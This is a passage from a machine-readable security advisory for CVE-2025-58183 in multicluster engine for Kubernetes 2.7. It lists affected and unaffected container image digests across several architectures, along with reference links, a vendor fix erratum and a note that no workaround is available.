"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:23:47+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.12/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
